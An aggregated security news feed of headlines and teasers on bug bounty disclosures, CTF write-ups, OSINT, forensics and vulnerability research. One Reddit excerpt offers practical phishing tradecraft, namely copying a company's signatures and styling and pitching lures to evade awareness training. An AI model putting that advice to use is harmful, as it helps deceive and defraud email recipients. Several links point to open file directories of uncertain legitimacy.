    Our research and remediation teams have noticed an increase in WooCommerce credit card skimmers on client sites over the past few years, as detailed in past blog posts. Due to the increased number of plugins and components facilitating online payments and its ease of use, WordPress has become a common e-commerce platform — and the frequency in which the popular CMS is being targeted by attackers aiming to steal sensitive personal information and credit card details is also accelerating. Continue reading WooCommerce Credit Card Skimmers Concealed In Fake Images at Sucuri Blog.
  • Open

    Simple session-based testing with ZAP HTTP Sessions
    ZAP has a feature called HTTP Sessions. From the name and the options I had only ever assumed it was something to do with session handling and had never actually used it. Today, while wandering through the menus to see whether I had missed any features, I found it and tried it out. It looks like it can remove a fair amount of the friction of testing, so I am writing it up here :D HTTP Sessions As the name suggests, HTTP Sessions is a feature that makes ZAP automatically recognise the sessions used in HTTP and makes them available to other actions. Explaining it in words alone will not give you much of a feel for it, so let's walk through how it is used in the order below.
  • Open

    Blind XSS via Feedback form.
    Judge.me disclosed a bug submitted by b3hlull: https://hackerone.com/reports/1339034 - Bounty: $1250
    Self-DoS due to template injection via email field in password reset form on access.acronis.com
    Acronis disclosed a bug submitted by sudo_bash: https://hackerone.com/reports/1265344
  • Open

    How to conduct VAPT?
    How to conduct a VAPT? Continue reading on Medium »

  • Open

    HTB[CTF]: Lame [Easy]
    Let's start our CTF by performing reconnaissance of the environment we will be facing… We begin with a port scan: Continue reading on Medium »
    HTB[CTF]: Pennyworth [Easy]
    Let's start by running a basic port scan against our target; I will use nmap for this. Continue reading on Medium »
    Fun with DLL’s — Part 1 — DLL Search Order Hijacking
    This post is part of a new series I’m starting titled “Fun with DLL’s” where I will dive into the specifics of Windows DLLs. In this… Continue reading on Medium »
    Red Team Powershell Scripts
    Various PowerShell scripts that may be useful during red team exercise Continue reading on Medium »
  • Open

    My iPhone is making calls to kozow.com
    Should I be worried? From my research it is a c2 of some malware. Any advice or check? submitted by /u/punto2019 [link] [comments]
    Is there a simple way to easily verify which download link on a site (with multiple 'download buttons') is the correct one?
    Cheers! submitted by /u/Unusual-Resolve-7521 [link] [comments]
  • Open

    Passed my GSEC!
    Passed my GSEC with an 84 today, not as high as I was hoping but comfortably in the middle. Overall I am happy with the experience! My job gets vouchers for SANS every year so which course should I pursue next if I can get a voucher? For context I work Cyber Threat Analysis and Passive/Active Network Analysis. Currently have GNFA as my only other cert. submitted by /u/Johnsonwilliam977 [link] [comments]
  • Open

    UNC3524: Eye Spy on Your Email
    submitted by /u/mattjayy [link] [comments]
    How masscan works
    submitted by /u/rushter_ [link] [comments]
    Augury: Using Data Memory-Dependent Prefetchers to Leak Data at Rest (on Apple M1 and similar)
    submitted by /u/nicuramar [link] [comments]
    AWS Targeted by a Package Backfill Attack
    submitted by /u/viagas472 [link] [comments]
  • Open

    He110 W0r1d
    My dear digital natives, developer, hackers and programmers… It’s nice to meet everyone of you! Continue reading on Medium »
    War in Ukraine / May 1
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    NahamCon Capture The Flag 2022 [Indonesian version]
    Note that this write-up only covers the Open Source Intelligence (OSINT) category challenges of NahamCon CTF 2022. Continue reading on Medium »
    Making an untraceable smartphone…
    Let’s talk about… anonymity. Today we will talk about the security of our mobile phones. Let’s start with hadware… Continue reading on Medium »
  • Open

    North Korean books and pictures, my guess is that it's run by some Jucheist in the west trying to share around DPRK propaganda, interesting to look through and might be helpful if you're curious about reading books from NK and don't know where to look
    submitted by /u/subwaytech [link] [comments]
    Some Games
    http://ashamanecore.com/dicpics/Games/ submitted by /u/Madman3001 [link] [comments]
    A Google drive folder with movies, books, audiobooks and shows
    [ Removed by reddit in response to a copyright notice. ] submitted by /u/EpikDuckiee [link] [comments]
    a bunch of files about military boats (mostly pictures)
    submitted by /u/subwaytech [link] [comments]
  • Open

    SecWiki News 2022-05-02 Review
    SecWiki Weekly (Issue 426) by ourren; Python Cookbook, 3rd edition, Chinese translation by ourren. For more of the latest articles, visit SecWiki
  • Open

    Reflected XSS Vulnerability leads to Credential Stealing worth $100
    Hi! This is Rian with my very first bug bounty write-up. Continue reading on Medium »
    A Bug Bounty Hunter’s Guide to IDOR Vulnerabilities
    How to find, exploit, and prevent insecure direct object references Continue reading on Medium »
  • Open

    Breakout from the Seccomp Unconfined Container
    submitted by /u/tbhaxor [link] [comments]
  • Open

    g_CiOptions in a Virtualized World
    With the leaking of code signing certificates and exploits for vulnerable drivers becoming common occurrences, adversaries are adopting the kernel as their new playground. And with Microsoft making technologies like Virtualization Based Security (VBS) and Hypervisor Code Integrity (HVCI) available, I wanted to take some time to understand just how vulnerable endpoints are when faced... The post g_CiOptions in a Virtualized World appeared first on TrustedSec.
  • Open

    Advanced BPF Notes (4): Debugging BPF programs
    These are notes taken while reading some advanced BPF tutorials. About the "Advanced BPF Notes" series: compiled while learning and using BPF day to day. Since these are notes rather than a tutorial, the content does not aim to be continuous; readers with some background can use them to fill gaps. Unless stated otherwise, the code in this post is based on kernel 5.10.
    Series: Advanced BPF Notes (1): BPF program (BPF Prog) types in detail: use cases, function signatures, attach points and example programs; Advanced BPF Notes (2): BPF Map types in detail: use cases and example programs; Advanced BPF Notes (3): kernel implementation of BPF Maps; Advanced BPF Notes (4): Debugging BPF programs.
    Contents: 1 Printing logs; 1.1 Log path and format; 1.2 bpf_printk(): kernel 5.2+ (usage, limitations, kernel implementation); 1.3 bpf_trace_printk() (usage, limitations, kernel implementation); 2 Tracing one BPF program with another BPF program (BPF trampoline); 2.1 Use cases; 2.2 Dependency: kernel 5.5+; 3 Setting breakpoints and single-stepping; 3.1 bpf_dbg (cBPF only).
    1 Printing logs. 1.1 Log path and format. The several logging methods introduced in this section all end up writing to the debugfs path /sys/kernel/debug/tracing/trace: $ sudo tail /sys/kernel/debug/tracing/trace # field description - telnet-470 [001] .N.. 419421.045894: 0x000…

  • Open

    (XSS) Account takeover using Steam
    This story begins a couple of years ago. I was navigating through a gambling website (which I cannot disclose) when I decided I would… Continue reading on Medium »
    Exploiting IRCTC along with few other government domains through XXE
    In this blog I would be giving an Insight about XXE(XML External Entity) injection and a practical attack case study where I did… Continue reading on System Weakness »
    AlbusSec:- Penetration-List 06 SQL Injection (SQLi) — Part 2
    Hello Cybersecurity folks, I hope that you liked the previous article, so here you’ll learn the basics of SQLi. Today’s article… Continue reading on Medium »
    Active VS Passive Reconnaissance
    Just like many other cybersecurity terms, “Reconnaissance” also derives from the military jargon. Continue reading on Bug Zero »
  • Open

    Putin signs presidential decree: set up IT security departments immediately, ban information security equipment from unfriendly countries
    Russian President Putin has formally signed a presidential decree on additional measures to ensure Russia's information security, ordering all Russian ministries, agencies and backbone organisations to set up IT security departments.
  • Open

    XSS at http://nextapps.mtnonline.com/search/suggest/q/{xss payload}
    MTN Group disclosed a bug submitted by homosec: https://hackerone.com/reports/1244722
    XSS at videostore.mtnonline.com/GL/*.aspx via all parameters
    MTN Group disclosed a bug submitted by homosec: https://hackerone.com/reports/1244731
    Enumerate class codes via yahoo dork - Can access any course under teacher - Sensitive information leaked
    Khan Academy disclosed a bug submitted by bughunterpol: https://hackerone.com/reports/1514356
  • Open

    Feedback Welcome
    Phishing Tips
    Avoid the classics: Urgent Problem to fix (unpaid invoice, hotel bill, acct. compromise). Making the request too important or urgent raises suspicion and decreases the odds of user compliance since these tactics are hammered in modern Security Awareness training (yes, people will still click, but not as many).
    Embrace Subtlety and Play Hard to Get: Signature format, company fonts, colors; match everything up to build trust levels. E-mail HR or someone else from the company with a normal question, wait for their reply, then collect the above items.
    Emotions without Urgency: Normalcy and trust must be intertwined with the emotion you choose to target (RARELY make specific requests in the message body; remember that if they're interested they're going to cli…
    Linux Privilege Escalation (Series)
    submitted by /u/tbhaxor
  • Open

    War in Ukraine / April 30
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Online Tools For OSINT
    A collection of several hundred online tools for OSINT Continue reading on Medium »
    MAC-address OSINT
    I propose to study the sources intended for the study of the MAC address. MAC or Media Access Control is a unique combination of numbers… Continue reading on Medium »
    SPY NEWS: Week 17
    Summary of the espionage-related news stories for the Week 17 (24–30 April) of 2022. Continue reading on Medium »
  • Open

    Is it wrong for GitHub to host hacking tools?
    The culture of most mainstream cyber sec forums / portals is "do no harm". Most forum members will thankfully not co-operate if they suspect their advice will be used for nefarious purposes. However, this culture of keeping things clean is slightly subverted by GitHub who seem to have some very potent hacking tools on their site. Yet, I rarely hear the media or other internet commentators lambast them in the same way that Walmart gets criticised for selling arms. Any thoughts on this? submitted by /u/astillero
  • Open

    SecWiki News 2022-05-01 Review
    No news updated yet today~ For more of the latest articles, visit SecWiki
  • Open

    [Cullinan #33] Add PP/IDOR/Type Juggling and SAML Injection 🪁
    This is Cullinan log #33. I have added new entries for Prototype Pollution, IDOR, Type Juggling and SAML Injection, and added a section on SSRF Chains to the SSRF entry. New: Prototype Pollution, IDOR, Type Juggling, SAML Injection. Updated: Blind SSRF, Canaries in SSRF. As an aside, I remember that not long after I wrote up and posted Prototype Pollution, it came up as the core topic of the Intigriti XSS Challenge 0422, so I had less fumbling around to do! The timing was really good :D
  • Open

    Vulnerabilities that shook the internet
    Introduction Continue reading on InfoSec Write-ups »
    NahamCon CTF 2022 Write-up: Click Me! Android challenge
    TryHackMe — Content Discovery
  • Open

    Ethical Hacking and other stuff
    I found this open directory. It contains tons of books and material related to ethical hacking. I am not sure about the quality of content, would like someone experienced in this field to comment on it. Tagging as NSFW as I haven't gone through all dirs. https://lira.epac.to/DOCS-TECH/Hacking/ submitted by /u/grvsood
  • Open

    Rails – XSS Vulnerability in Action View
    Article URL: https://discuss.rubyonrails.org/t/cve-2022-27777-possible-xss-vulnerability-in-action-view-tag-helpers/80534 Comments URL: https://news.ycombinator.com/item?id=31224906 Points: 1 # Comments: 1
    Reflected XSS Vulnerability Found in WordPress Anti-Malware Firewall
    Article URL: https://www.searchenginejournal.com/vulnerability-found-in-wordpress-anti-malware-firewall/448101/ Comments URL: https://news.ycombinator.com/item?id=31223394 Points: 1 # Comments: 0
  • Open

    iPhone Password cracking possible with ??
    Hi community … heard about Grayshift tool for conducting iOS forensics investigation …. Wanted to know how's that tool able to crack the passcode on the latest versions of iOS like 15.3 … how's it able to recover most of data by breaking the code. Any insights on this or on iOS forensics on latest versions would help .. Thanks submitted by /u/Aromatic_Ideal_2933
  • Open

    Changes In The Use Of LNK Files
    Not long ago, I posted regarding how LNK files can be (ab)used; the post refers to LNK file metadata, and how, if the LNK file is sent by the threat actor, that metadata can be used to learn about the threat actor's environment. I first saw this mentioned by JPCERT in 2016, where they included an interesting graph (figure 1) in their post to illustrate the point. Tony Lambert recently shared via his blog a change in Emotet TTPs, that the threat actor group had moved to using LNK files as an initial delivery mechanism. In the post, Tony described this as "a really interesting TTP change", and that it was "odd but not unexpected". Tony also shared a link to download a copy of the LNK file, as well as metadata parsed from the LNK sample via EXIFTool. I don't often use EXIFTool for this sort …
  • Open

    As an ethical hacker, network scanning techniques, also known as path tracing, can assist you in learning about a network’s logical configuration.
    submitted by /u/RaccoonCivil5453
    Analysis of phishing kill chain identifies emerging technique that exploits trust in your collaboration platforms
    submitted by /u/boybeaid

  • Open

    Best OS for exploit development against Windows
    What is the best OS to develop Windows exploits? Currently using Kali with VMware Workstation. What does everyone else use? submitted by /u/FutureMasterRoshi
  • Open

    Weird or looks like malicious behaviors but are actually normal
    What are the weird system or network behaviors that you think are weird and should be alerted on but actually are very common? Let me get started. Splunk and Nessus both love using long B64 PowerShell encoded commands to do stuff. Lots of legit stuff running whoami as SYSTEM. submitted by /u/Calm_Scene
    What tech should I be learning?
    I've been in IT for over 10 years. Jack of all trades, master of none. I've got experience with Linux, Windows, network engineering, and security. Several SANS certs. Vendor certs expired years ago. Trying to move more towards security. Currently learning more about SIEM and detection with Wazuh. One thing I'm lacking is any programming or even scripting skills. About to learn Python. PowerShell is also on the list. Other security interests include the following. 1. Compliance 2. Prevention 3. Detection Any technologies I should be looking into? Any topics I should read up on? Thanks! submitted by /u/damienhull
  • Open

    War in Ukraine / April 29
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Maltego for the poor or what are the free add-ons for it
    A long time ago I decided to write an article about making work with Maltego cheaper. The product is definitely great. But very expensive… Continue reading on Medium »
    Services for detecting deepfakes
    Fake Profile Detector (Deepfake, GAN) — this AI model only works on StyleGAN images used to create fake human faces of people that don’t… Continue reading on Medium »
  • Open

    SecWiki News 2022-04-30 Review
    A review of 0day vulnerabilities exploited in the wild in 2021 by ourren; Smarty template injection and sandbox escape by ourren; Interesting MISC by ourren. For more of the latest articles, visit SecWiki
  • Open

    SAML Injection
    🔍 Introduction SAML Injection refers to injection attacks that can occur in Security Assertion Markup Language (SAML). Through attack code placed inside the XML syntax during the SAML process, an attacker may bypass authentication flows such as SSO or pass signature verification. 🗡 Offensive techniques Detect Every place where SAML is used, such as SAML-based SSO, is a target for inspection. Start by checking signature verification: add or tamper with values in the SAML Response/Assertion message, for example via an XSW (XML Signature Wrapping) attack, and observe how the server reacts.
    Type Juggling (Loose Comparison Bug)
    🔍 Introduction Type Juggling is a vulnerability in which, depending on the Loose/Strict Comparison used when comparing multiple variables, an if statement or similar check can be passed with a value the developer did not intend. PHP is generally known to be affected. It is commonly known as PHP type juggling or the magic hashes attack. Comparison: Loose uses == (Equal) and != (Not Equal), and means the same value; Strict uses === (Equal) and !== (Not Equal), and means the same type and the same value. 🗡 Offensive techniques Detect In PHP code, == or !
    IDOR (Insecure Direct Object Reference)
    🔍 Introduction IDOR (Insecure Direct Object References) is an Access Control vulnerability: when externally exposed or user-supplied input directly references and accesses an Object, that input can be abused to perform actions beyond one's own privileges. Origin Request: GET /info?accountId=15442 IDOR Request: GET /info?accountId=1110 Generally this enables Horizontal privilege escalation, i.e. abuse of privileges at the same level, but depending on the application's configuration or policy it can sometimes lead to Vertical privilege escalation. 🗡 Offensive techniques Detect Every part of the application's processing logic where user input is directly referenced to an Object is affected.
  • Open

    Sensitive Data Exfiltration through XSS ($450)
    The story of my first bounty… Continue reading on Medium »
    Page Admin Disclosure when Posting a Reel
    Hello, I'm Syd from the Philippines. Today I would like to share one of my findings in the Meta Bug Bounty Program. The bug that I found is… Continue reading on Medium »
    Bypassing File Upload Restriction using Magic Bytes
    Hello Hunters & Ninjas, the article is very late, for that accept my apology. Today I'm going to write about one of my findings in which an… Continue reading on Medium »
    Burp Suite Extension for AWS Signing
    AWSSigner Continue reading on Medium »
    ATO without any interaction [aws cognito misconfiguration]
    Hello friends, Continue reading on Medium »
  • Open

    com.nextcloud.client bypass the protection lock in Android app v 3.18.1 latest version.
    Nextcloud disclosed a bug submitted by dashingjaved: https://hackerone.com/reports/1450368 - Bounty: $200
  • Open

    RW-Fuzzer: A Fuzzing Method for Vulnerability Mining on Router Web Interface
    submitted by /u/paran0ide
  • Open

    Music/Games (pretty slow)
    https://www.7xr.nl submitted by /u/whopops
  • Open

    HELP !! with Volatility
    Every time I run a command using Volatility I get the following output:
    Volatility Foundation Volatility Framework 2.6
    INFO    : volatility.debug    : Determining profile based on KDBG search...
    No suitable address space mapping found
    Tried to open image as:
     MachOAddressSpace: mac: need base
     LimeAddressSpace: lime: need base
     WindowsHiberFileSpace32: No base Address Space
     WindowsCrashDumpSpace64BitMap: No base Address Space
     WindowsCrashDumpSpace64: No base Address Space
     HPAKAddressSpace: No base Address Space
     VirtualBoxCoreDumpElf64: No base Address Space
     VMWareMetaAddressSpace: No base Address Space
     QemuCoreDumpElf: No base Address Space
     VMWareAddressSpace: No base Address Space
     WindowsCrashDumpSpace32: No base Address Space
     Win10AMD64PagedMemory: No base Address Space
     WindowsAMD64PagedMemory: No base Address Space
     LinuxAMD64PagedMemory: No base Address Space
     AMD64PagedMemory: No base Address Space
     IA32PagedMemoryPae: No base Address Space
     IA32PagedMemory: No base Address Space
     OSXPmemELF: No base Address Space
     FileAddressSpace: Location is not of file scheme
     ArmAddressSpace: No base Address Space
    Any help is more than welcome. Thank you!! submitted by /u/maxoberto

  • Open

    Root Cause Analysis
    One of the challenges within DFIR, particularly as we've moved to an enterprise approach by leveraging EDR telemetry, is the root cause analysis, or "RCA". In short, the challenge is observing malicious activity and determining the root cause; the challenge itself stems from the fact that EDR telemetry is only partial visibility, or that correlating observed malicious activity with causal data not evident or available via EDR telemetry requires additional context, and by extension, additional effort/expenditure of resources. It also requires an additional "leveling up" of skillsets.  Yes, many organizations that deploy EDR tooling also include a means for extracting additional files/data from the endpoint, and what to collect isn't usually in question. Rather, how to truly exploit the coll…
  • Open

    Lots of different stuff, including north korean electronic music
    submitted by /u/omnifage
    Collection of PDF books about HTML, CSS, JavaScript, Python and others
    http://198.74.52.119/ submitted by /u/senpie95
  • Open

    Bug Bounty Operating Principles
    Experiences from a number of programs, and trying to be fair, generous, and grateful to security researchers. Continue reading on Medium »
    How was I able to find my first bug in a real website?
    It was the days of August 2020 when I used to try to find XSS (Cross-Site Scripting) vulnerability because of the curiosity that I… Continue reading on Medium »
    OTP Bypass + PATO = 100 Dollars Bounty
    Hello ppl! This is Gnana Aravind here with another awesome write-up explaining the story of my recent bounty. Continue reading on Medium »
    New Vault in Hats.Finance
    We are excited to onboard Temple DAO to the Hats bug bounty program! They have decided to open their bug bounty vault with 450,000 $TEMPLE… Continue reading on Medium »
    Introduction to Smart Contract why it is so demanding in the IT world…
    Started my research a month ago into Smart Contracts as a Security Analyst of Avalance Global Solutions and that’s why I want to share my… Continue reading on Medium »
  • Open

    Hackthebox: Infiltration
    Lab: OSINT Continue reading on Medium »
    War in Ukraine / April 28
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Social pages monitoring
    I propose to discuss today such an issue as the organization of monitoring the social pages of employees. Otherwise, there is a great risk… Continue reading on Medium »
    Media monitoring in OSINT
    Today we will talk about monitoring mentions in the media using free sources: Continue reading on Medium »
    OSINT: It’s just Googling
    Olympic sprinting: It’s just moving your legs dead fast. Continue reading on Medium »
  • Open

    Reverse Engineering PsExec for fun and knowledge
    submitted by /u/CyberMasterV
    MacOS Forensics/ SANS FOR518
    Hey y'all, TLDR; I'm new to macOS forensics and need to purchase a Mac for SANS FOR518, but I'm confused around the hardware requirements. Is virtualisation on a Mac essential if I already have a Windows workstation? Could I get through the course/real world forensics with an M1 Mac? I'm looking at enrolling in the SANS FOR518 Mac Forensics course online and it states that an Intel Mac is required. 1) Is an Intel Mac a critical requirement in real world forensics, or will an M1 Mac be a better investment in the long term (performance, futureproofing)? I have a Windows machine to run Windows/Linux VMs. 2) What virtualisation is required during the FOR518 course? Is it to run Windows/Linux tools or to virtualise a suspect image? 3) MacBook Air or MacBook Pro? Does the MacBook Pro offer any significant benefits over the MacBook Air for the forensic use case? I'm looking at the base 8GB model - maybe 16GB if I absolutely need it. Appreciate any advice! submitted by /u/hiddenbytes
    DoD Contracting Digital Forensics
    Greetings, Anyone have any experience doing digital forensics contracting for the DoD? A recruiter from Akima reached out to me for a contracted position for a federal agency doing exactly what I do now (digital forensics for law enforcement). The pay is nearly double and nets me a Top Security clearance (I previously held Public Trust). I would be crazy not to make the jump, right? submitted by /u/BlockchainForensics
    Current free training?
    I know there were some posts about this a while ago, but nothing current. Anyone know of any free trainings related to computer/phone forensics? submitted by /u/foxcop91
  • Open

    Reflected XSS due to vulnerable version of sockjs
    Automattic disclosed a bug submitted by chip_sec: https://hackerone.com/reports/1100326 - Bounty: $250
    Hardcoded AWS credentials in .msi
    8x8 disclosed a bug submitted by chip_sec: https://hackerone.com/reports/1368690
    Reflected XSS []
    U.S. Dept Of Defense disclosed a bug submitted by fdeleite: https://hackerone.com/reports/1309385
    Reflected XSS []
    U.S. Dept Of Defense disclosed a bug submitted by fdeleite: https://hackerone.com/reports/1309237
    lfi in filePathDownload parameter via
    U.S. Dept Of Defense disclosed a bug submitted by exploitmsf: https://hackerone.com/reports/1542734
    Sensitive data exposure via /secure/QueryComponent!Default.jspa endpoint on
    U.S. Dept Of Defense disclosed a bug submitted by njmulsqb: https://hackerone.com/reports/1278977
    SSRF due to CVE-2021-27905 in www.
    U.S. Dept Of Defense disclosed a bug submitted by fdeleite: https://hackerone.com/reports/1183472
    vulnerable to CVE-2022-22954
    U.S. Dept Of Defense disclosed a bug submitted by null_bytes: https://hackerone.com/reports/1537543
    Blind SQL Injection
    U.S. Dept Of Defense disclosed a bug submitted by mido0x0x: https://hackerone.com/reports/771215
    SQL INJECTION in https:///
    U.S. Dept Of Defense disclosed a bug submitted by mido0x0x: https://hackerone.com/reports/723044
    Possibility to force an admin to install recommended applications
    Nextcloud disclosed a bug submitted by igorpyan: https://hackerone.com/reports/1403614 - Bounty: $100
    OAUTH2 bearer not-checked for connection re-use
    Internet Bug Bounty disclosed a bug submitted by monnerat: https://hackerone.com/reports/1552110 - Bounty: $2400
    CVE-2022-22576: OAUTH2 bearer bypass in connection re-use
    curl disclosed a bug submitted by monnerat: https://hackerone.com/reports/1526328
    DoS via large console messages
    Mattermost disclosed a bug submitted by thesecuritydev: https://hackerone.com/reports/1243724 - Bounty: $150
    CVE-2022-27776: Auth/cookie leak on redirect
    Internet Bug Bounty disclosed a bug submitted by nyymi: https://hackerone.com/reports/1551591 - Bounty: $480
    CVE-2022-27775: Bad local IPv6 connection reuse
    Internet Bug Bounty disclosed a bug submitted by nyymi: https://hackerone.com/reports/1551588 - Bounty: $480
    CVE-2022-27774: Credential leak on redirect
    Internet Bug Bounty disclosed a bug submitted by nyymi: https://hackerone.com/reports/1551586 - Bounty: $2400
  • Open

    SecWiki News 2022-04-29 Review
    No news updated yet today~ For more of the latest articles, visit SecWiki
  • Open

    Introducing MutableSecurity: Seamless deployment and management of security solutions
    submitted by /u/iosifache
    Be aware of this trick: Python module hijacking leading to code execution
    submitted by /u/slashtmp00
  • Open

    Best Nessus parser that works with v10 for free/cheap?
    We currently use Nessus Pro for vulnerability scanning. However, the output reports it generates are not very helpful; often there can be 10 or 20 lines in the output CSV that refer to the same vulnerability on the same computer, whereas what we need is an actual actionable report that says these PCs have this vulnerability which you fix with this patch, or something similar. I found this article https://www.sans.org/blog/data-data-everywhere-what-to-do-with-volumes-of-nessus-output/ however it is from 2014 and the parser it links to is from 2017 and seems to require a Linux installation with Perl; we are a Windows organisation. Is there an up to date piece of software which does this kind of thing either free or low cost and runs on Windows? We can't afford Tenable.io for our entire workstation estate, this is why we have Nessus instead. submitted by /u/danj2k
    Are SOC roles notoriously slow?
    Got my first tier 1 SOC role for a small company (2k employees). My training was: watch vSphere and contact the virtualization admin if anything goes over 90% usage for more than 10 mins. Watch LogRhythm. The baseline is 5k logs. Report if it goes over for an extended period of time. Answer SolarWinds alarms. Report if it's not a false positive. That's it. That's what I do all day every day for 63k a year. How does this translate into a higher role? "Yeah I'm good at staring at a dashboard all day" Why can't they just tack this on as an additional responsibility to help desk or the sysadmin? I dread the day the company realizes they're wasting 60k * 6 employees to operate a 24/7 SOC when all we do is watch Netflix all day and then they lay us off and I didn't even get any transferable skills to help get me a replacement job. Regarding certs, I've received a lot of bad feedback on certs. No job interview has ever even asked about my certs. People always flame and say "why would I hire a cert chaser?" Because I have a bunch already. All CompTIA which I know doesn't compare to something like CISSP but certs have just left a bad taste in my mouth. I have A+ Net+ Sec+ CySA+ PenTest+ and AZ-900. submitted by /u/guywithaquestchin
    Shodan vs Criminal ip
    I mentioned a search engine and a product called Criminal IP a while ago! I think the page is open now, and I'm using one feature or another. I saw a post posted by a developer on the OSINT channel about Criminal IP, but I'm still a beginner, so I don't understand what you mean. But what I can see exactly is that it looks quite similar to Shodan. Which do you think is more valuable in terms of studying security, Shodan or Criminal IP? Below is the link to the post of the developer and the related post I posted a while ago. https://www.reddit.com/r/OSINT/comments/ucyo2c/we_made_a_new_osint_tool_criminalipio_i_would/ https://www.reddit.com/r/netsecstudents/comments/uct4pn/search_engine_preregistration_criminal_ip/ submitted by /u/Alexiosplana
    Security Architecture study recommendations
    Hi, I am hoping to get some advice on which particular study/certification would be best suited to improving and consolidating my current experience. First a bit of background. I’ve been working in IT since 2004 and moved into network security in 2007. I’ve always worked for service providers who provided network security consultancy and expertise so I have about 15 years experience mostly in implementation of firewalls, web proxies, load balancers, IPS, AAA, VPN, some virtualisation, that kind of stuff. I’ve worked in some of the largest and most well known companies providing mostly deployment capabilities in these types of technologies for customers mostly in banking and telco industries. I would say about 85% deployment and 15% design. A large portion of the deployment work however w…
  • Open

    Trello From the Other Side: Tracking APT29 Phishing Campaigns
    submitted by /u/dmchell
    Cybersecurity conferences
    Hi guys! Does anybody know what are the most interesting hacking and cybersecurity conferences in Europe? submitted by /u/Derrick_Wallarm
  • Open

    Red Teaming Toolkit
    This repository contains cutting-edge open-source security tools (OST) that will help you during adversary simulation and as information… Continue reading on Medium »
  • Open

    Flask session forgery
    Preface: this article uses problems encountered in CTFs to discuss session forgery. Although many masters have already written about it, and written very well, I still want to record it myself, which also makes it convenient to review later. There was a session forgery problem in ciscn, and since I had not done one before
    French medical software company fined 1.5 million euros for leaking the data of 490,000 patients
    Recently, the French regulator, the National Commission on Informatics and Liberty (CNIL), fined medical software vendor Dedalus Biology 1.5 million euros.
    China Mobile sending strange text messages? It reminded me of the telecom industry's nuclear-grade vulnerability
    Interestingly, although this vulnerability has existed for a long time, attackers have been exploiting it all along. Today let's talk again about this remarkable SS7 vulnerability.
    NSA Network Infrastructure Security Guide (translation) (Part 3)
    This report presents best practices for overall network security protection and network device protection, which can help administrators prevent adversaries from exploiting their networks for attacks. The guidance provided is general and can be applied to many types of network devices.
    Vulnerability analysis: stack overflow (CVE-2006-3439) vulnerability analysis
    The vulnerability, disclosed by Microsoft in 2006, is a remote code execution vulnerability caused by a stack overflow in the Server service.
    From 0 to 1: how to do monitoring well in security operations? | FreeBuf Party A community livestream recap
    Cybersecurity operations is about how to discover deficiencies, analyze their causes, and how to resolve incidents and prevent them from recurring.
    FreeBuf Party A group topic discussion | Let's talk about enterprise offense-defense exercises
    Should today's offense-defense exercises be carried out regularly to "take stock" of security? What changes or impacts does remote work under pandemic conditions bring to offense-defense exercises?
    Attackers hijack large numbers of WordPress sites to launch DDoS attacks against Ukraine
    Attackers are conducting DDoS (distributed denial of service) attacks against pro-Ukrainian websites and government portals.
    FreeBuf Weekly | Beijing Health Kit hit by overseas cyberattack; Coca-Cola confirms cyberattack and launches investigation
    According to Gartner, security and risk management leaders need to address seven major trends to protect their enterprise's ever-expanding digital footprint from new threats.
    Topic preview | Discussing approaches to applying zero trust architecture in financial enterprises
    Follow the experts, taking "the practical needs of zero trust" as the entry point, from concept to practice, to improve every security practitioner's understanding of zero trust architecture.
    Microsoft fixes ExtraReplica Azure vulnerabilities that exposed user databases
    These vulnerabilities could allow a malicious user to escalate privileges after bypassing authentication and gain access to other customers' databases.
    Research finds ransom payments account for only 15% of total losses from ransomware attacks
    The financial outlay victims incur from incident response, system recovery, legal fees, monitoring costs and the overall impact of business disruption caused by the extortion far exceeds the ransom amount.
    Official notice: Beijing Health Kit hit by overseas cyberattack
    On April 28, Beijing Health Kit suffered a cyberattack during peak usage; preliminary analysis found that the attack originated from abroad.
    Spring Framework CVE-2022-22965 breakdown analysis
    Regarding the environment debugging and content of the CVE-2022-22965 vulnerability, after reading around online I felt that some knowledge points must be understood before the vulnerability can be understood, so I wrote up in detail the whole process, from analysis of the Spring framework structure, through environment setup, to vulnerability analysis and debugging.
  • Open

    ExtraReplica – a cross-account database vulnerability in Azure PostgreSQL
    Article URL: https://www.wiz.io/blog/wiz-research-discovers-extrareplica-cross-account-database-vulnerability-in-azure-postgresql/ Comments URL: https://news.ycombinator.com/item?id=31203059 Points: 1 # Comments: 0
    Passing Time Syncing Secrets:Demonstrating Covert Channel Vulnerability in PTP
    Article URL: https://media-exp1.licdn.com/dms/document/C562DAQHsEBEOv6vilA/profile-treasury-document-pdf-analyzed/0/1650330515418?e=2147483647&v=beta&t=LKNnvu80n_mLo7USD2tudioeaERrXwGXqYIwNSODO64 Comments URL: https://news.ycombinator.com/item?id=31201656 Points: 1 # Comments: 1
  • Open

    Hacked Website Threat Report 2021
    Our 2021 Website Threat Research Report details our findings and analysis of emerging and ongoing trends and threats in the website security landscape. We’ve put together this analysis to help keep website owners informed and aware of the dangers posed by malicious actors. This year’s report is a collection of observations made by Sucuri’s Research and Remediation teams from data collected on web-based malware, vulnerable software, and attacks during 2021. The data used in this report is a representative sample of the total number of websites that our Remediation team performed services for throughout the year 2021, as well as more than 132 million SiteCheck scans. Continue reading Hacked Website Threat Report 2021 at Sucuri Blog.

  • Open

    Steganography for E01 files??
    I have an E01 file that I know has some data inside, but I can't find any software that can extract from an E01 file. It's 2.6GB so I don't really want to do it manually. Do you guys have any suggestions? submitted by /u/KTthemajicgoat
    Android TV examination
    Hello, has anyone had any experience of examining a device (television) running the Android TV OS or similar? I'm not aware of any digital forensics software (Cellebrite etc) that you could use for such a task so presumably the only option is a manual examination. There seems to be very little information or discussion around this so any thoughts would be appreciated. submitted by /u/dwaynehicks2179
  • Open

    Socket: New tool takes a proactive approach to prevent OSS supply chain attacks
    submitted by /u/feross
    LAPSUS$: Recent techniques, tactics and procedures
    submitted by /u/digicat
    Kubernetes Goat - Interactive Kubernetes Security Learning Playground 🚀
    submitted by /u/madhuakula
    reposaur - use Rego to audit your GitHub org security posture
    submitted by /u/fproulx
    Colibri Loader's Unique Persistence Technique Using Get-Variable Cmdlet
    submitted by /u/sciencestudent99
    Anatomy of a Zero Day - How to decrypt....a robot?
    submitted by /u/312sec
    How to save Fiddler Everywhere results in the SEQUENCE they were captured? I'm trying to save the raw data IN SEQUENCE as captured but am unable to save in the sequence it was captured.
    submitted by /u/sahastra
    How to master Google Hacking (Dorking)
    submitted by /u/hisfuntie
    Bypassing LDAP Channel Binding with StartTLS
    submitted by /u/AlmondOffSec
